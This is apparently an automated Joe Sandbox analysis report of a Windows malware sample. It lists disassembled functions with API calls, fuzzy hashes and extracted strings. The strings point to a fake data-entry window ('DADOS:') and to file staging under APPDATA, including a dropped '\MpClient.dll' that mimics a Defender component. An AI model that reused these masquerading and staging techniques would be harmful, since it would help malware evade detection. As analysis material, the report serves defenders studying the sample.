Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 92d369be98cd84a8a903efbefd0849b4bd506ebe7a5afd05e5e2784e18ac746c
Instruction ID: 9c49ed1a3cc23a6595d977f899bd7f7443bafc73c9c98cf719ccb9654cf01e02
Opcode Fuzzy Hash: 92d369be98cd84a8a903efbefd0849b4bd506ebe7a5afd05e5e2784e18ac746c
Instruction Fuzzy Hash: B3A18FA2B18E4189EB10CB66D0802BC37B1FB49B68F5466B2DF5D57BA9DF38D495C300

Function 00007FFE1A525358 Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A525380

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7ad09473c782f8dc529e5663a01ed68149036ce2c9f2766279c415f3b2981f88
Instruction ID: 3302e7a9406900efe0afda28892e21143a34723505a8c17594cfd699ff813e52
Opcode Fuzzy Hash: 7ad09473c782f8dc529e5663a01ed68149036ce2c9f2766279c415f3b2981f88
Instruction Fuzzy Hash: 2641B332A1CA01C7EA748F7AA54017973A2EB57F69F5011B7D68F426A1CF6CE402C690

Function 00007FFE1A522648 Relevance: 1.6, APIs: 1, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A5226F4

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c4a6c7b9929798d1e063fbb8a7a1a7bd7e8043aa37a6c10037cb29915f99552d
Instruction ID: d60cbd708cb9461ecbdb6cae981ad7f9f276a805053464403722020d19240d6b
Opcode Fuzzy Hash: c4a6c7b9929798d1e063fbb8a7a1a7bd7e8043aa37a6c10037cb29915f99552d
Instruction Fuzzy Hash: F2319566B0CA81C1EE659E97941137D6292AF56FF0F1845F3EB5C47AE5DE7CE4008700

Function 00007FFE1A52770C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A527792

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 689fd4db9d84ad48b0cbe6459feb01de88ca7c1a07636e2c191934c9eff5ceab
Instruction ID: 8e1ba8a02d7ff8e01b8c1d890f659a984c2258b357a3dfd72517031d9dab4b04
Opcode Fuzzy Hash: 689fd4db9d84ad48b0cbe6459feb01de88ca7c1a07636e2c191934c9eff5ceab
Instruction Fuzzy Hash: 1A317622B1CA42D2EA55AB97984037C2692AB42FB4F4542F7EA18033F2DF7CE4418720

Function 00007FFE1A517010 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b765f6517e10bec1985b32977898c444c88c62840e81c753a3adfe4d74f9a1ad
Instruction ID: ace5274ae109f9771ff8773c1b06e450adbc906c7777f45380708c55a39b8b08
Opcode Fuzzy Hash: b765f6517e10bec1985b32977898c444c88c62840e81c753a3adfe4d74f9a1ad
Instruction Fuzzy Hash: EA119431F0CB4286E2149B2B484157566E6BFA3FA0F6485FAE90C43765EF3CE9528B00

Function 00007FFE1A5301E8 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A53020B

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83266d44e4f98da389c69e3bd07ae213debcdc94483fb891895f99587be99892
Instruction ID: 4789b002a6cde7408908e7eacd23996db6d70bc2acd66bc3f4a8be787c8009fd
Opcode Fuzzy Hash: 83266d44e4f98da389c69e3bd07ae213debcdc94483fb891895f99587be99892
Instruction Fuzzy Hash: 10217F32B0CB8186DB618F1AD44037976A1AFC6FB4F5482B6FA5D466E9DF3CD4118B00

Function 00007FFE1A52F0B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A52F0E3

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6d2f51effba6a0bc0a79cbcce2b98ffd819fad5b130e421008aace6f625ed984
Instruction ID: 465421d6b29f7cfc5c5fd1892cb492c196124812178d4c4f9f0f14a9ef09912f
Opcode Fuzzy Hash: 6d2f51effba6a0bc0a79cbcce2b98ffd819fad5b130e421008aace6f625ed984
Instruction Fuzzy Hash: 1B115B32B1CE42C2E3149B56E44017963A2BB42FA4F5504FBEA5D47AB6DF3CE8258740

Function 00007FFE1A5178A8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFE1A5178BC

Part of subcall function 00007FFE1A51A138: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FFE1A51A140
Part of subcall function 00007FFE1A51A138: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FFE1A51A145

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
String ID:
API String ID: 1208906642-0
Opcode ID: 4cb00d2282186d267046a56c705df3e517128b625a6b5b87494460d6418fb319
Instruction ID: 74c35103ed543fc233a98dd36e05fe41513904fb28895a16377e613c9926ed7c
Opcode Fuzzy Hash: 4cb00d2282186d267046a56c705df3e517128b625a6b5b87494460d6418fb319
Instruction Fuzzy Hash: 6FE0B624F0DA43B0FDA93A6B14022B902825F23B28F5005FBD94D121F39E0E25869A21

Function 000000018000F3E0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 000000018000F412

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 5267c0eb9fe83bd75c2fc8e568bcce4b0b1a39183d354a8089e76d1fce0b7076
Instruction ID: 6f7253d867e2b003b7b6154aae22474b3a8d438b9628ef1c8caa36876391553d
Opcode Fuzzy Hash: 5267c0eb9fe83bd75c2fc8e568bcce4b0b1a39183d354a8089e76d1fce0b7076
Instruction Fuzzy Hash: 80E04F31701A4881EF99DB26DC553D52352F788BC0FA48836E50E47361DE29C38A8300

Function 00007FFE1A513BD0 Relevance: 1.5, APIs: 1, Instructions: 14threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FFE1A513BF2

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: b6560575fd8a5c162710b1d90f27067cc713330eb6e06cd65e496cb809c763d6
Instruction ID: f7996a0dc1eea5c85e3156044b8caad1fcfce76c4814d90ada7bab9624a335cf
Opcode Fuzzy Hash: b6560575fd8a5c162710b1d90f27067cc713330eb6e06cd65e496cb809c763d6
Instruction Fuzzy Hash: 05D05E76F08A4182E7608B31795127A3AA2FB95720F9042B7C94D82A34EE3CC1118600

Function 00007FFE1A5267C8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FFE1A52371E,?,?,0000D7DE7D030913,00007FFE1A52286D,?,?,?,?,00007FFE1A52515A,?,?,00000000), ref: 00007FFE1A52681D

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 4d1fd190e12ffa04828e6a8f5a8d989bbb0d989dbdba264bc8eca98262be66b5
Instruction ID: 41a9684f29d7c33c158c9394c13ed031668937e82c201b2bde51aab48a04dedc
Opcode Fuzzy Hash: 4d1fd190e12ffa04828e6a8f5a8d989bbb0d989dbdba264bc8eca98262be66b5
Instruction Fuzzy Hash: 79F04955F1DE47E0FE5856E368502B506D39F8AFA0F4C94F7C90E86AA1EE2CE4818220

Function 00007FFE1A5252D0 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FFE1A525141,?,?,00000000,00007FFE1A52A407,?,?,?,00007FFE1A521527,?,?,?,00007FFE1A52141D), ref: 00007FFE1A52530E

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 6067859bb7fcf1225511093c18746ad94754b424aeec6d41dfd126933a8eb519
Instruction ID: fbcfde1c92ff69d224e9ada8a22ca8f2fb48ec8392a5a3362f7862dd49d432de
Opcode Fuzzy Hash: 6067859bb7fcf1225511093c18746ad94754b424aeec6d41dfd126933a8eb519
Instruction Fuzzy Hash: 07F0E201F1CF02C1FE285AF368402B802824F96FB0F0892F7DC2F866E1ED6CE4404110

Non-executed Functions

Function 0000000180024920 Relevance: 238.1, APIs: 118, Strings: 17, Instructions: 1852windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 0000000180024983
GetWindowTextLengthW.USER32 ref: 00000001800249AF
PostMessageW.USER32 ref: 0000000180024AE7
PostQuitMessage.USER32 ref: 00000001800251E5
CreateWindowExW.USER32 ref: 00000001800252AE
CreateWindowExW.USER32 ref: 0000000180025307
SendMessageW.USER32 ref: 0000000180025367
CreateFontW.GDI32 ref: 00000001800253B0
SendMessageW.USER32 ref: 00000001800253C7
SendMessageW.USER32 ref: 00000001800253E3
SetFocus.USER32 ref: 00000001800253F0
BeginPaint.USER32 ref: 00000001800266B5
SetBkMode.GDI32 ref: 00000001800266C6
CreateFontW.GDI32 ref: 000000018002675D
SelectObject.GDI32 ref: 0000000180026769
CreateFontW.GDI32 ref: 00000001800267F2
SelectObject.GDI32 ref: 00000001800267FE
DestroyWindow.USER32 ref: 0000000180026C5B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180026C86
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180026C8C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180026C98
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180026C9E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180026CAA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180026CB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180026CB6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180026CBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180026CC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180026CC8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180026CCE

Strings

PARENTMODAL5, xrefs: 00000001800259C9, 000000018002695B
DADOS:, xrefs: 0000000180024AB6, 0000000180024CA6
EDIT, xrefs: 00000001800252FB, 00000001800254DF, 00000001800256C0, 00000001800258A1, 0000000180025A85, 0000000180025C69, 0000000180025E4A, 000000018002602B, 000000018002659D
PARENTMODAL7, xrefs: 0000000180025D8E, 0000000180026A85
PARENTMODAL1, xrefs: 000000018002523F, 0000000180026707
PARENTMODAL9, xrefs: 0000000180026150, 0000000180026BE1
&, xrefs: 0000000180026190
|, xrefs: 000000018002625D
PARENTMODAL8, xrefs: 0000000180025F72, 0000000180026B1A
", xrefs: 0000000180026C01
button, xrefs: 00000001800252A5, 0000000180025489, 000000018002566A, 000000018002584B, 0000000180025A2F, 0000000180025C13, 0000000180025DF4, 0000000180025FD5, 00000001800261B9, 0000000180026217, 0000000180026272, 00000001800262CD, 0000000180026328, 0000000180026383, 00000001800263DE, 0000000180026439, 0000000180026494, 00000001800264EF, 000000018002654A
x, xrefs: 000000018002657C
PARENTMODAL2, xrefs: 0000000180025423, 000000018002679C
Tahoma, xrefs: 0000000180025224, 00000001800266EC
PARENTMODAL6, xrefs: 0000000180025BAD, 00000001800269F0
PARENTMODAL4, xrefs: 00000001800257E8, 00000001800268C6
PARENTMODAL3, xrefs: 0000000180025607, 0000000180026831

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CreateMessageWindow$FontSend$ObjectPostSelect$BeginDestroyFocusLengthModePaintProcQuitText
String ID: "$&$DADOS:$EDIT$PARENTMODAL1$PARENTMODAL2$PARENTMODAL3$PARENTMODAL4$PARENTMODAL5$PARENTMODAL6$PARENTMODAL7$PARENTMODAL8$PARENTMODAL9$Tahoma$button$x$|
API String ID: 3284177671-1234955931
Opcode ID: 2d94f8758c25da290d595d37411687f5289f41ef9b190fcaabe75a78bea45db4
Instruction ID: c0310bc73b1607907ba5d339a242cc9acb890d9bd2db8ac6c77ab21bcbf3b304
Opcode Fuzzy Hash: 2d94f8758c25da290d595d37411687f5289f41ef9b190fcaabe75a78bea45db4
Instruction Fuzzy Hash: 11236E72214B8486F792CF64F8547DA7BA1F7887D8F508515FA8947AA8DF7DC288CB00

Function 000000018000FCA0 Relevance: 171.8, APIs: 73, Strings: 24, Instructions: 2086filesleepCOMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00000001800100AF
__std_fs_convert_narrow_to_wide.LIBCPMT ref: 00000001800100F6
__std_fs_convert_narrow_to_wide.LIBCPMT ref: 0000000180010134
GetModuleFileNameA.KERNEL32 ref: 00000001800105B9
__std_fs_code_page.LIBCPMT ref: 00000001800105DE
__std_fs_convert_narrow_to_wide.LIBCPMT ref: 000000018001062A
__std_fs_convert_narrow_to_wide.LIBCPMT ref: 000000018001066B
__std_fs_code_page.LIBCPMT ref: 000000018001090F
__std_fs_convert_narrow_to_wide.LIBCPMT ref: 000000018001095B
__std_fs_convert_narrow_to_wide.LIBCPMT ref: 000000018001099D
MoveFileA.KERNEL32 ref: 0000000180010A7F
Sleep.KERNEL32 ref: 0000000180010A8A
CopyFileA.KERNEL32 ref: 0000000180010ACD
MoveFileA.KERNEL32 ref: 0000000180010CA8
Sleep.KERNEL32 ref: 0000000180010CB3
CopyFileA.KERNEL32 ref: 0000000180010CEF

Part of subcall function 00000001800211E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800212E9
Part of subcall function 00000001800211E0: Concurrency::cancel_current_task.LIBCPMT ref: 00000001800212EF

Part of subcall function 000000018001E6D0: __std_fs_code_page.LIBCPMT ref: 000000018001E706
Part of subcall function 000000018001E6D0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 000000018001E745
Part of subcall function 000000018001E6D0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 000000018001E77D

CopyFileA.KERNEL32 ref: 0000000180010E5B
CopyFileA.KERNEL32 ref: 0000000180011087
CopyFileA.KERNEL32 ref: 00000001800112D9
CopyFileA.KERNEL32 ref: 0000000180011464
CopyFileA.KERNEL32 ref: 00000001800116DA
__std_fs_code_page.LIBCPMT ref: 000000018001195F
__std_fs_convert_narrow_to_wide.LIBCPMT ref: 00000001800119AC
__std_fs_convert_narrow_to_wide.LIBCPMT ref: 00000001800119ED
MoveFileA.KERNEL32 ref: 0000000180011A8D
Sleep.KERNEL32 ref: 0000000180011A98
CopyFileA.KERNEL32 ref: 0000000180011AD8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011CCF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011CDB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011CE1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011CED
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011CF3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011CFF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D05
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D36
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D3C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D48
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D4E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D54
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D60
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D66
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D82
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D94
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011D9A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011DB6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011DBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011DC8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011DCE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011DDA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011DE0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011DEC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011DF2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011DFE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E04
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E0A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E16
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E1C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E28
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E2E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E3A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E40
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E58
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E5E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E64
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E70
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E76
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E98
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011E9E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011EA4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011EAA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180011EB0

Part of subcall function 000000018001A710: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001A768

Strings

APPDATA, xrefs: 000000018000FD23, 000000018000FD69
8.jpg, xrefs: 0000000180011299
\ab3.ini, xrefs: 0000000180011332
create_directories, xrefs: 0000000180011D29
\abr1.ini, xrefs: 0000000180010B42
3.jpg, xrefs: 0000000180011424
USERPROFILE, xrefs: 000000018000FD7B
\MpClient.dll, xrefs: 0000000180011922
0.jpg, xrefs: 0000000180010E1B
\ab8.ini, xrefs: 00000001800111A7
\Microsoft, xrefs: 000000018000FD37
@, xrefs: 0000000180010931
PUBLIC, xrefs: 000000018000FD72
.old, xrefs: 0000000180010A39, 0000000180010C65, 0000000180011A49
\ab.ini, xrefs: 0000000180010D29
2.jpg, xrefs: 0000000180010FEC
\ab2.ini, xrefs: 0000000180010EB4
6.jpg, xrefs: 0000000180011637
\ab6.ini, xrefs: 00000001800114BD
.exe, xrefs: 0000000180010345
\abr.ini, xrefs: 000000018001081B, 0000000180010AA8
0, xrefs: 00000001800109AE
\abr2.ini, xrefs: 000000018001182C, 0000000180011AB3
.dll, xrefs: 00000001800104E4

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$File$__std_fs_convert_narrow_to_wide$Copy$__std_fs_code_page$MoveSleep$Concurrency::cancel_current_taskModuleName
String ID: .dll$.exe$.old$0$0.jpg$2.jpg$3.jpg$6.jpg$8.jpg$@$APPDATA$PUBLIC$USERPROFILE$\Microsoft$\MpClient.dll$\ab.ini$\ab2.ini$\ab3.ini$\ab6.ini$\ab8.ini$\abr.ini$\abr1.ini$\abr2.ini$create_directories
API String ID: 3067840413-1340940961
Opcode ID: e36900d66ae5e0e27912a54036210e421a18000bd6dfcd701cda5d6de1efbb41
